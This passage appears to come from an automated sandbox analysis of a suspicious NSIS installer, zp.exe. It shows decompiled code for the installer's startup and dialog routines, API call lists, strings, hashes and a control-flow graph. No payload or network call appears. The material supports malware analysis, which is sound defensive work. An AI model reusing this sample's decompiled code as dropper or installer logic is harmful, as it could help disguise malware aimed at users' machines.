                                                            				signed int _t100;
                                                            				void* _t103;
                                                            				void* _t108;
                                                            				char _t110;
                                                            				int _t129;
                                                            				int _t130;
                                                            				CHAR* _t137;
                                                            				int _t138;
                                                            				int _t140;
                                                            				intOrPtr* _t143;
                                                            				char* _t146;
                                                            				int _t147;
                                                            				void* _t148;
                                                            				void* _t149;
                                                            				char _t166;
                                                            
                                                            				 *(_t149 + 0x18) = 0;
                                                            				 *((intOrPtr*)(_t149 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
                                                            				 *(_t149 + 0x20) = 0;
                                                            				 *((char*)(_t149 + 0x14)) = 0x20;
                                                            				__imp__#17();
                                                            				_t38 = SetErrorMode(0x8001); // executed
                                                            				__imp__OleInitialize(0); // executed
                                                            				 *0x423798 = _t38;
                                                            				 *0x4236e4 = E00406009(8);
                                                            				SHGetFileInfoA(0x41eca0, 0, _t149 + 0x38, 0x160, 0); // executed
                                                            				E00405CDE("Bogtilrettelgnings82 Setup", "NSIS Error");
                                                            				_t43 = GetCommandLineA();
                                                            				_t146 = "\"C:\\Users\\Arthur\\Desktop\\zp.exe\"";
                                                            				E00405CDE(_t146, _t43);
                                                            				 *0x4236e0 = GetModuleHandleA(0);
                                                            				_t46 = _t146;
                                                            				if("\"C:\\Users\\Arthur\\Desktop\\zp.exe\"" == 0x22) {
                                                            					 *((char*)(_t149 + 0x14)) = 0x22;
                                                            					_t46 =  &M00429001;
                                                            				}
                                                            				_t48 = CharNextA(E00405799(_t46,  *((intOrPtr*)(_t149 + 0x14))));
                                                            				 *(_t149 + 0x1c) = _t48;
                                                            				while(1) {
                                                            					_t110 =  *_t48;
                                                            					_t151 = _t110;
                                                            					if(_t110 == 0) {
                                                            						break;
                                                            					}
                                                            					__eflags = _t110 - 0x20;
                                                            					if(_t110 != 0x20) {
                                                            						L5:
                                                            						__eflags =  *_t48 - 0x22;
                                                            						 *((char*)(_t149 + 0x14)) = 0x20;
                                                            						if( *_t48 == 0x22) {
                                                            							_t48 =  &(_t48[1]);
                                                            							__eflags = _t48;
                                                            							 *((char*)(_t149 + 0x14)) = 0x22;
                                                            						}
                                                            						__eflags =  *_t48 - 0x2f;
                                                            						if( *_t48 != 0x2f) {
                                                            							L17:
                                                            							_t48 = E00405799(_t48,  *((intOrPtr*)(_t149 + 0x14)));
                                                            							__eflags =  *_t48 - 0x22;
                                                            							if(__eflags == 0) {
                                                            								_t48 =  &(_t48[1]);
                                                            								__eflags = _t48;
                                                            							}
                                                            							continue;
                                                            						}
                                                            						_t48 =  &(_t48[1]);
                                                            						__eflags =  *_t48 - 0x53;
                                                            						if( *_t48 != 0x53) {
                                                            							L12:
                                                            							__eflags =  *_t48 - ((( *0x4091df << 0x00000008 |  *0x4091de) << 0x00000008 |  *0x4091dd) << 0x00000008 | "NCRC");
                                                            							if( *_t48 != ((( *0x4091df << 0x00000008 |  *0x4091de) << 0x00000008 |  *0x4091dd) << 0x00000008 | "NCRC")) {
                                                            								L16:
                                                            								__eflags =  *((intOrPtr*)(_t48 - 2)) - ((( *0x4091d7 << 0x00000008 |  *0x4091d6) << 0x00000008 |  *0x4091d5) << 0x00000008 | " /D=");
                                                            								if( *((intOrPtr*)(_t48 - 2)) == ((( *0x4091d7 << 0x00000008 |  *0x4091d6) << 0x00000008 |  *0x4091d5) << 0x00000008 | " /D=")) {
                                                            									 *((char*)(_t48 - 2)) = 0;
                                                            									__eflags =  &(_t48[2]);
                                                            									E00405CDE("C:\\Users\\Arthur\\Vkstcentrene\\unprotuberant",  &(_t48[2]));
                                                            									break;
                                                            								}
                                                            								goto L17;
                                                            							}
                                                            							_t129 = _t48[4];
                                                            							__eflags = _t129 - 0x20;
                                                            							if(_t129 == 0x20) {
                                                            								L15:
                                                            								_t13 = _t149 + 0x20;
                                                            								 *_t13 =  *(_t149 + 0x20) | 0x00000004;
                                                            								__eflags =  *_t13;
                                                            								goto L16;
                                                            							}
                                                            							__eflags = _t129;
                                                            							if(_t129 != 0) {
                                                            								goto L16;
                                                            							}
                                                            							goto L15;
                                                            						}
                                                            						_t130 = _t48[1];
                                                            						__eflags = _t130 - 0x20;
                                                            						if(_t130 == 0x20) {
                                                            							L11:
                                                            							 *0x423780 = 1;
                                                            							goto L12;
                                                            						}
                                                            						__eflags = _t130;
                                                            						if(_t130 != 0) {
                                                            							goto L12;
                                                            						}
                                                            						goto L11;
                                                            					} else {
                                                            						goto L4;
                                                            					}
                                                            					do {
                                                            						L4:
                                                            						_t48 =  &(_t48[1]);
                                                            						__eflags =  *_t48 - 0x20;
                                                            					} while ( *_t48 == 0x20);
                                                            					goto L5;
                                                            				}
                                                            				_t137 = "C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
                                                            				GetTempPathA(0x400, _t137); // executed
                                                            				_t52 = E004031E3(_t151);
                                                            				_t152 = _t52;
                                                            				if(_t52 != 0) {
                                                            					L25:
                                                            					DeleteFileA("1033"); // executed
                                                            					_t54 = E00402C79(_t154,  *(_t149 + 0x20)); // executed
                                                            					 *((intOrPtr*)(_t149 + 0x10)) = _t54;
                                                            					if(_t54 != 0) {
                                                            						L35:
                                                            						E00403675();
                                                            						__imp__OleUninitialize();
                                                            						if( *((intOrPtr*)(_t149 + 0x10)) == 0) {
                                                            							__eflags =  *0x423774;
                                                            							if( *0x423774 != 0) {
                                                            								_t147 = E00406009(3);
                                                            								_t140 = E00406009(4);
                                                            								_t59 = E00406009(5);
                                                            								__eflags = _t147;
                                                            								_t138 = _t59;
                                                            								if(_t147 != 0) {
                                                            									__eflags = _t140;
                                                            									if(_t140 != 0) {
                                                            										__eflags = _t138;
                                                            										if(_t138 != 0) {
                                                            											_t64 =  *_t147(GetCurrentProcess(), 0x28, _t149 + 0x1c);
                                                            											__eflags = _t64;
                                                            											if(_t64 != 0) {
                                                            												 *_t140(0, "SeShutdownPrivilege", _t149 + 0x28);
                                                            												 *(_t149 + 0x3c) = 1;
                                                            												 *(_t149 + 0x48) = 2;
                                                            												 *_t138( *((intOrPtr*)(_t149 + 0x30)), 0, _t149 + 0x2c, 0, 0, 0);
                                                            											}
                                                            										}
                                                            									}
                                                            								}
                                                            								_t60 = ExitWindowsEx(2, 0);
                                                            								__eflags = _t60;
                                                            								if(_t60 == 0) {
                                                            									E0040140B(9);
                                                            								}
                                                            							}
                                                            							_t56 =  *0x42378c;
                                                            							__eflags = _t56 - 0xffffffff;
                                                            							if(_t56 != 0xffffffff) {
                                                            								 *(_t149 + 0x18) = _t56;
                                                            							}
                                                            							ExitProcess( *(_t149 + 0x18));
                                                            						}
                                                            						E004054F2( *((intOrPtr*)(_t149 + 0x14)), 0x200010);
                                                            						ExitProcess(2);
                                                            					}
                                                            					if( *0x4236fc == 0) {
                                                            						L34:
                                                            						 *0x42378c =  *0x42378c | 0xffffffff;
                                                            						 *(_t149 + 0x18) = E00403767();
                                                            						goto L35;
                                                            					}
                                                            					_t143 = E00405799(_t146, 0);
                                                            					if(_t143 < _t146) {
                                                            						L31:
                                                            						_t161 = _t143 - _t146;
                                                            						 *((intOrPtr*)(_t149 + 0x10)) = "Error launching installer";
                                                            						if(_t143 < _t146) {
                                                            							lstrcatA(_t137, "~nsu.tmp");
                                                            							if(lstrcmpiA(_t137, "C:\\Users\\Arthur\\Desktop") == 0) {
                                                            								goto L35;
                                                            							}
                                                            							CreateDirectoryA(_t137, 0);
                                                            							SetCurrentDirectoryA(_t137);
                                                            							_t166 = "C:\\Users\\Arthur\\Vkstcentrene\\unprotuberant"; // 0x43
                                                            							if(_t166 == 0) {
                                                            								E00405CDE("C:\\Users\\Arthur\\Vkstcentrene\\unprotuberant", "C:\\Users\\Arthur\\Desktop");
                                                            							}
                                                            							E00405CDE(0x424000,  *(_t149 + 0x1c));
                                                            							_t148 = 0x1a;
                                                            							 *0x424400 = "A";
                                                            							do {
                                                            								E00405D00(0, _t137, 0x41e8a0, 0x41e8a0,  *((intOrPtr*)( *0x4236f0 + 0x120)));
                                                            								DeleteFileA(0x41e8a0);
                                                            								if( *((intOrPtr*)(_t149 + 0x10)) != 0 && CopyFileA("C:\\Users\\Arthur\\Desktop\\zp.exe", 0x41e8a0, 1) != 0) {
                                                            									E00405B92(0x41e8a0, 0);
                                                            									E00405D00(0, _t137, 0x41e8a0, 0x41e8a0,  *((intOrPtr*)( *0x4236f0 + 0x124)));
                                                            									_t86 = E00405491(0x41e8a0);
                                                            									if(_t86 != 0) {
                                                            										CloseHandle(_t86);
                                                            										 *((intOrPtr*)(_t149 + 0x10)) = 0;
                                                            									}
                                                            								}
                                                            								 *0x424400 =  *0x424400 + 1;
                                                            								_t148 = _t148 - 1;
                                                            							} while (_t148 != 0);
                                                            							E00405B92(_t137, 0);
                                                            							goto L35;
                                                            						}
                                                            						 *_t143 = 0;
                                                            						_t144 = _t143 + 4;
                                                            						if(E0040585C(_t161, _t143 + 4) == 0) {
                                                            							goto L35;
                                                            						}
                                                            						E00405CDE("C:\\Users\\Arthur\\Vkstcentrene\\unprotuberant", _t144);
                                                            						E00405CDE("C:\\Users\\Arthur\\Vkstcentrene\\unprotuberant\\Benediktinerklostrets\\Rehandles\\Abortionist\\Korses", _t144);
                                                            						 *((intOrPtr*)(_t149 + 0x10)) = 0;
                                                            						goto L34;
                                                            					}
                                                            					_t100 = (( *0x4091b7 << 0x00000008 |  *0x4091b6) << 0x00000008 |  *0x4091b5) << 0x00000008 | " _?=";
                                                            					while( *_t143 != _t100) {
                                                            						_t143 = _t143 - 1;
                                                            						if(_t143 >= _t146) {
                                                            							continue;
                                                            						}
                                                            						goto L31;
                                                            					}
                                                            					goto L31;
                                                            				}
                                                            				GetWindowsDirectoryA(_t137, 0x3fb);
                                                            				lstrcatA(_t137, "\\Temp");
                                                            				_t103 = E004031E3(_t152);
                                                            				_t153 = _t103;
                                                            				if(_t103 != 0) {
                                                            					goto L25;
                                                            				}
                                                            				GetTempPathA(0x3fc, _t137);
                                                            				lstrcatA(_t137, "Low");
                                                            				SetEnvironmentVariableA("TEMP", _t137);
                                                            				SetEnvironmentVariableA("TMP", _t137);
                                                            				_t108 = E004031E3(_t153);
                                                            				_t154 = _t108;
                                                            				if(_t108 == 0) {
                                                            					goto L35;
                                                            				}
                                                            				goto L25;
                                                            			}





























                                                            0x00403223
                                                            0x00403227
                                                            0x0040322f
                                                            0x00403233
                                                            0x00403238
                                                            0x00403243
                                                            0x0040324a
                                                            0x00403252
                                                            0x0040325c
                                                            0x00403272
                                                            0x00403282
                                                            0x00403287
                                                            0x0040328d
                                                            0x00403294
                                                            0x004032a7
                                                            0x004032ac
                                                            0x004032ae
                                                            0x004032b0
                                                            0x004032b5
                                                            0x004032b5
                                                            0x004032c5
                                                            0x004032cb
                                                            0x00403394
                                                            0x00403394
                                                            0x00403396
                                                            0x00403398
                                                            0x0040339e
                                                            0x0040339e
                                                            0x004032d4
                                                            0x004032d7
                                                            0x004032df
                                                            0x004032df
                                                            0x004032e2
                                                            0x004032e7
                                                            0x004032e9
                                                            0x004032e9
                                                            0x004032ea
                                                            0x004032ea
                                                            0x004032ef
                                                            0x004032f2
                                                            0x00403384
                                                            0x00403389
                                                            0x0040338e
                                                            0x00403391
                                                            0x00403393
                                                            0x00403393
                                                            0x00403393
                                                            0x00000000
                                                            0x00403391
                                                            0x004032f8
                                                            0x004032f9
                                                            0x004032fc
                                                            0x00403314
                                                            0x0040333f
                                                            0x00403341
                                                            0x00403354
                                                            0x0040337f
                                                            0x00403382
                                                            0x004033a0
                                                            0x004033a3
                                                            0x004033ac
                                                            0x00000000
                                                            0x004033ac
                                                            0x00000000
                                                            0x00403382
                                                            0x00403343
                                                            0x00403346
                                                            0x00403349
                                                            0x0040334f
                                                            0x0040334f
                                                            0x0040334f
                                                            0x0040334f
                                                            0x00000000
                                                            0x0040334f
                                                            0x0040334b
                                                            0x0040334d
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040334d
                                                            0x004032fe
                                                            0x00403301
                                                            0x00403304
                                                            0x0040330a
                                                            0x0040330a
                                                            0x00000000
                                                            0x0040330a
                                                            0x00403306
                                                            0x00403308
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004032d9
                                                            0x004032d9
                                                            0x004032d9
                                                            0x004032da
                                                            0x004032da
                                                            0x00000000
                                                            0x004032d9
                                                            0x004033b7
                                                            0x004033c2
                                                            0x004033c4
                                                            0x004033c9
                                                            0x004033cb
                                                            0x00403423
                                                            0x00403428
                                                            0x00403432
                                                            0x00403439
                                                            0x0040343d
                                                            0x004034d1
                                                            0x004034d1
                                                            0x004034d6
                                                            0x004034e0
                                                            0x004035da
                                                            0x004035e0
                                                            0x004035eb
                                                            0x004035f4
                                                            0x004035f6
                                                            0x004035fb
                                                            0x004035fd
                                                            0x004035ff
                                                            0x00403601
                                                            0x00403603
                                                            0x00403605
                                                            0x00403607
                                                            0x00403617
                                                            0x00403619
                                                            0x0040361b
                                                            0x00403628
                                                            0x00403637
                                                            0x0040363f
                                                            0x00403647
                                                            0x00403647
                                                            0x0040361b
                                                            0x00403607
                                                            0x00403603
                                                            0x0040364c
                                                            0x00403652
                                                            0x00403654
                                                            0x00403658
                                                            0x00403658
                                                            0x00403654
                                                            0x0040365d
                                                            0x00403662
                                                            0x00403665
                                                            0x00403667
                                                            0x00403667
                                                            0x0040366f
                                                            0x0040366f
                                                            0x004034ef
                                                            0x004034f6
                                                            0x004034f6
                                                            0x00403449
                                                            0x004034c1
                                                            0x004034c1
                                                            0x004034cd
                                                            0x00000000
                                                            0x004034cd
                                                            0x00403452
                                                            0x00403456
                                                            0x0040348c
                                                            0x0040348c
                                                            0x0040348e
                                                            0x00403496
                                                            0x00403502
                                                            0x00403516
                                                            0x00000000
                                                            0x00000000
                                                            0x0040351a
                                                            0x00403521
                                                            0x00403527
                                                            0x0040352d
                                                            0x00403535
                                                            0x00403535
                                                            0x00403543
                                                            0x0040355a
                                                            0x00403562
                                                            0x00403568
                                                            0x00403574
                                                            0x0040357a
                                                            0x00403584
                                                            0x0040359a
                                                            0x004035ab
                                                            0x004035b1
                                                            0x004035b8
                                                            0x004035bb
                                                            0x004035c1
                                                            0x004035c1
                                                            0x004035b8
                                                            0x004035c5
                                                            0x004035cb
                                                            0x004035cb
                                                            0x004035d0
                                                            0x00000000
                                                            0x004035d0
                                                            0x00403498
                                                            0x0040349a
                                                            0x004034a5
                                                            0x00000000
                                                            0x00000000
                                                            0x004034ad
                                                            0x004034b8
                                                            0x004034bd
                                                            0x00000000
                                                            0x004034bd
                                                            0x00403481
                                                            0x00403483
                                                            0x00403487
                                                            0x0040348a
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040348a
                                                            0x00000000
                                                            0x00403483
                                                            0x004033d3
                                                            0x004033df
                                                            0x004033e4
                                                            0x004033e9
                                                            0x004033eb
                                                            0x00000000
                                                            0x00000000
                                                            0x004033f3
                                                            0x004033fb
                                                            0x0040340c
                                                            0x00403414
                                                            0x00403416
                                                            0x0040341b
                                                            0x0040341d
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000

                                                            APIs
                                                            • #17.COMCTL32 ref: 00403238
                                                            • SetErrorMode.KERNELBASE(00008001), ref: 00403243
                                                            • OleInitialize.OLE32(00000000), ref: 0040324A
                                                              • Part of subcall function 00406009: GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000008), ref: 0040601B
                                                              • Part of subcall function 00406009: LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000008), ref: 00406026
                                                              • Part of subcall function 00406009: GetProcAddress.KERNEL32(00000000,?), ref: 00406037
                                                            • SHGetFileInfoA.SHELL32(0041ECA0,00000000,?,00000160,00000000,00000008), ref: 00403272
                                                              • Part of subcall function 00405CDE: lstrcpynA.KERNEL32(?,?,00000400,00403287,Bogtilrettelgnings82 Setup,NSIS Error), ref: 00405CEB
                                                            • GetCommandLineA.KERNEL32(Bogtilrettelgnings82 Setup,NSIS Error), ref: 00403287
                                                            • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\zp.exe",00000000), ref: 0040329A
                                                            • CharNextA.USER32(00000000,"C:\Users\user\Desktop\zp.exe",00000020), ref: 004032C5
                                                            • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004033C2
                                                            • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004033D3
                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033DF
                                                            • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033F3
                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004033FB
                                                            • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040340C
                                                            • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403414
                                                            • DeleteFileA.KERNELBASE(1033), ref: 00403428
                                                            • OleUninitialize.OLE32(?), ref: 004034D6
                                                            • ExitProcess.KERNEL32 ref: 004034F6
                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\zp.exe",00000000,?), ref: 00403502
                                                            • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 0040350E
                                                            • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040351A
                                                            • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403521
                                                            • DeleteFileA.KERNEL32(0041E8A0,0041E8A0,?,00424000,?), ref: 0040357A
                                                            • CopyFileA.KERNEL32(C:\Users\user\Desktop\zp.exe,0041E8A0,00000001), ref: 0040358E
                                                            • CloseHandle.KERNEL32(00000000,0041E8A0,0041E8A0,?,0041E8A0,00000000), ref: 004035BB
                                                            • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403610
                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 0040364C
                                                            • ExitProcess.KERNEL32 ref: 0040366F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                            • String ID: "$"C:\Users\user\Desktop\zp.exe"$1033$Bogtilrettelgnings82 Setup$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\zp.exe$C:\Users\user\Vkstcentrene\unprotuberant$C:\Users\user\Vkstcentrene\unprotuberant\Benediktinerklostrets\Rehandles\Abortionist\Korses$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$`Kmw$~nsu.tmp
                                                            • API String ID: 4107622049-1883879892
                                                            • Opcode ID: 9d4426ba838105f0d7d34f101a5e3210ade380a600151a39266de6a9d1435484
                                                            • Instruction ID: 10d5b1ce5ea8024dda8b9430cf8fc6ad938cae2f300cbf654cf654b9e6cc86b6
                                                            • Opcode Fuzzy Hash: 9d4426ba838105f0d7d34f101a5e3210ade380a600151a39266de6a9d1435484
                                                            • Instruction Fuzzy Hash: 70B107706083517AE721AF619D89A2B7EACEB41706F04447FF541BA2D2C77C9E01CB6E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 113 405107-405123 114 4052b4-4052ba 113->114 115 405129-4051f2 GetDlgItem * 3 call 404001 call 404867 GetClientRect GetSystemMetrics SendMessageA * 2 113->115 117 4052e4-4052f0 114->117 118 4052bc-4052de GetDlgItem CreateThread CloseHandle 114->118 137 405210-405213 115->137 138 4051f4-40520e SendMessageA * 2 115->138 120 405312-405318 117->120 121 4052f2-4052f8 117->121 118->117 122 40531a-405320 120->122 123 40536d-405370 120->123 125 405333-40533a call 404033 121->125 126 4052fa-40530d ShowWindow * 2 call 404001 121->126 127 405322-40532e call 403fa5 122->127 128 405346-405356 ShowWindow 122->128 123->125 131 405372-405378 123->131 134 40533f-405343 125->134 126->120 127->125 135 405366-405368 call 403fa5 128->135 136 405358-405361 call 404fc9 128->136 131->125 139 40537a-40538d SendMessageA 131->139 135->123 136->135 142 405223-40523a call 403fcc 137->142 143 405215-405221 SendMessageA 137->143 138->137 144 405393-4053bf CreatePopupMenu call 405d00 AppendMenuA 139->144 145 40548a-40548c 139->145 152 405270-405291 GetDlgItem SendMessageA 142->152 153 40523c-405250 ShowWindow 142->153 143->142 150 4053c1-4053d1 GetWindowRect 144->150 151 4053d4-4053ea TrackPopupMenu 144->151 145->134 150->151 151->145 154 4053f0-40540a 151->154 152->145 157 405297-4052af SendMessageA * 2 152->157 155 405252-40525d ShowWindow 153->155 156 40525f 153->156 158 40540f-40542a SendMessageA 154->158 159 405265-40526b call 404001 155->159 156->159 157->145 158->158 160 40542c-40544c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 158->160 159->152 162 40544e-40546e SendMessageA 160->162 162->162 163 405470-405484 GlobalUnlock SetClipboardData CloseClipboard 162->163 163->145
                                                            C-Code - Quality: 96%
                                                            			E00405107(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                            				struct HWND__* _v8;
                                                            				struct tagRECT _v24;
                                                            				void* _v32;
                                                            				signed int _v36;
                                                            				int _v40;
                                                            				int _v44;
                                                            				signed int _v48;
                                                            				int _v52;
                                                            				void* _v56;
                                                            				void* _v64;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				struct HWND__* _t87;
                                                            				struct HWND__* _t89;
                                                            				long _t90;
                                                            				int _t95;
                                                            				int _t96;
                                                            				long _t99;
                                                            				void* _t102;
                                                            				intOrPtr _t113;
                                                            				void* _t121;
                                                            				intOrPtr _t124;
                                                            				struct HWND__* _t128;
                                                            				int _t150;
                                                            				int _t153;
                                                            				long _t157;
                                                            				struct HWND__* _t161;
                                                            				struct HMENU__* _t163;
                                                            				long _t165;
                                                            				void* _t166;
                                                            				char* _t167;
                                                            				char* _t168;
                                                            
                                                            				_t87 =  *0x422ec4; // 0x103d0
                                                            				_t157 = _a8;
                                                            				_t150 = 0;
                                                            				_v8 = _t87;
                                                            				if(_t157 != 0x110) {
                                                            					__eflags = _t157 - 0x405;
                                                            					if(_t157 == 0x405) {
                                                            						_t121 = CreateThread(0, 0, E0040509B, GetDlgItem(_a4, 0x3ec), 0,  &_a8); // executed
                                                            						CloseHandle(_t121);
                                                            					}
                                                            					__eflags = _t157 - 0x111;
                                                            					if(_t157 != 0x111) {
                                                            						L17:
                                                            						__eflags = _t157 - 0x404;
                                                            						if(_t157 != 0x404) {
                                                            							L25:
                                                            							__eflags = _t157 - 0x7b;
                                                            							if(_t157 != 0x7b) {
                                                            								goto L20;
                                                            							}
                                                            							_t89 = _v8;
                                                            							__eflags = _a12 - _t89;
                                                            							if(_a12 != _t89) {
                                                            								goto L20;
                                                            							}
                                                            							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
                                                            							__eflags = _t90 - _t150;
                                                            							_a12 = _t90;
                                                            							if(_t90 <= _t150) {
                                                            								L36:
                                                            								return 0;
                                                            							}
                                                            							_t163 = CreatePopupMenu();
                                                            							AppendMenuA(_t163, _t150, 1, E00405D00(_t150, _t157, _t163, _t150, 0xffffffe1));
                                                            							_t95 = _a16;
                                                            							__eflags = _a16 - 0xffffffff;
                                                            							_t153 = _a16 >> 0x10;
                                                            							if(_a16 == 0xffffffff) {
                                                            								GetWindowRect(_v8,  &_v24);
                                                            								_t95 = _v24.left;
                                                            								_t153 = _v24.top;
                                                            							}
                                                            							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
                                                            							__eflags = _t96 - 1;
                                                            							if(_t96 == 1) {
                                                            								_t165 = 1;
                                                            								__eflags = 1;
                                                            								_v56 = _t150;
                                                            								_v44 = 0x41fce0;
                                                            								_v40 = 0xfff;
                                                            								_a4 = _a12;
                                                            								do {
                                                            									_a4 = _a4 - 1;
                                                            									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
                                                            									__eflags = _a4 - _t150;
                                                            									_t165 = _t165 + _t99 + 2;
                                                            								} while (_a4 != _t150);
                                                            								OpenClipboard(_t150);
                                                            								EmptyClipboard();
                                                            								_t102 = GlobalAlloc(0x42, _t165);
                                                            								_a4 = _t102;
                                                            								_t166 = GlobalLock(_t102);
                                                            								do {
                                                            									_v44 = _t166;
                                                            									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
                                                            									 *_t167 = 0xd;
                                                            									_t168 = _t167 + 1;
                                                            									 *_t168 = 0xa;
                                                            									_t166 = _t168 + 1;
                                                            									_t150 = _t150 + 1;
                                                            									__eflags = _t150 - _a12;
                                                            								} while (_t150 < _a12);
                                                            								GlobalUnlock(_a4);
                                                            								SetClipboardData(1, _a4);
                                                            								CloseClipboard();
                                                            							}
                                                            							goto L36;
                                                            						}
                                                            						__eflags =  *0x422eac - _t150; // 0x0
                                                            						if(__eflags == 0) {
                                                            							ShowWindow( *0x4236e8, 8);
                                                            							__eflags =  *0x42376c - _t150;
                                                            							if( *0x42376c == _t150) {
                                                            								_t113 =  *0x41f4b8; // 0x6f40bc
                                                            								E00404FC9( *((intOrPtr*)(_t113 + 0x34)), _t150);
                                                            							}
                                                            							E00403FA5(1);
                                                            							goto L25;
                                                            						}
                                                            						 *0x41f0b0 = 2;
                                                            						E00403FA5(0x78);
                                                            						goto L20;
                                                            					} else {
                                                            						__eflags = _a12 - 0x403;
                                                            						if(_a12 != 0x403) {
                                                            							L20:
                                                            							return E00404033(_t157, _a12, _a16);
                                                            						}
                                                            						ShowWindow( *0x422eb0, _t150);
                                                            						ShowWindow(_v8, 8);
                                                            						E00404001(_v8);
                                                            						goto L17;
                                                            					}
                                                            				}
                                                            				_v48 = _v48 | 0xffffffff;
                                                            				_v36 = _v36 | 0xffffffff;
                                                            				_v56 = 2;
                                                            				_v52 = 0;
                                                            				_v44 = 0;
                                                            				_v40 = 0;
                                                            				asm("stosd");
                                                            				asm("stosd");
                                                            				_t124 =  *0x4236f0;
                                                            				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
                                                            				_a8 =  *((intOrPtr*)(_t124 + 0x60));
                                                            				 *0x422eb0 = GetDlgItem(_a4, 0x403);
                                                            				 *0x422ea8 = GetDlgItem(_a4, 0x3ee);
                                                            				_t128 = GetDlgItem(_a4, 0x3f8);
                                                            				 *0x422ec4 = _t128;
                                                            				_v8 = _t128;
                                                            				E00404001( *0x422eb0);
                                                            				 *0x422eb4 = E00404867(4);
                                                            				 *0x422ecc = 0;
                                                            				GetClientRect(_v8,  &_v24);
                                                            				_v48 = _v24.right - GetSystemMetrics(0x15);
                                                            				SendMessageA(_v8, 0x101b, 0,  &_v56); // executed
                                                            				SendMessageA(_v8, 0x1036, 0x4000, 0x4000); // executed
                                                            				if(_a12 >= 0) {
                                                            					SendMessageA(_v8, 0x1001, 0, _a12);
                                                            					SendMessageA(_v8, 0x1026, 0, _a12);
                                                            				}
                                                            				if(_a8 >= _t150) {
                                                            					SendMessageA(_v8, 0x1024, _t150, _a8);
                                                            				}
                                                            				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                            				_push(0x1b);
                                                            				E00403FCC(_a4);
                                                            				if(( *0x4236f8 & 0x00000003) != 0) {
                                                            					ShowWindow( *0x422eb0, _t150);
                                                            					if(( *0x4236f8 & 0x00000002) != 0) {
                                                            						 *0x422eb0 = _t150;
                                                            					} else {
                                                            						ShowWindow(_v8, 8);
                                                            					}
                                                            					E00404001( *0x422ea8);
                                                            				}
                                                            				_t161 = GetDlgItem(_a4, 0x3ec);
                                                            				SendMessageA(_t161, 0x401, _t150, 0x75300000);
                                                            				if(( *0x4236f8 & 0x00000004) != 0) {
                                                            					SendMessageA(_t161, 0x409, _t150, _a8);
                                                            					SendMessageA(_t161, 0x2001, _t150, _a12);
                                                            				}
                                                            				goto L36;
                                                            			}




































                                                            0x0040510d
                                                            0x00405115
                                                            0x00405118
                                                            0x00405120
                                                            0x00405123
                                                            0x004052b4
                                                            0x004052ba
                                                            0x004052d7
                                                            0x004052de
                                                            0x004052de
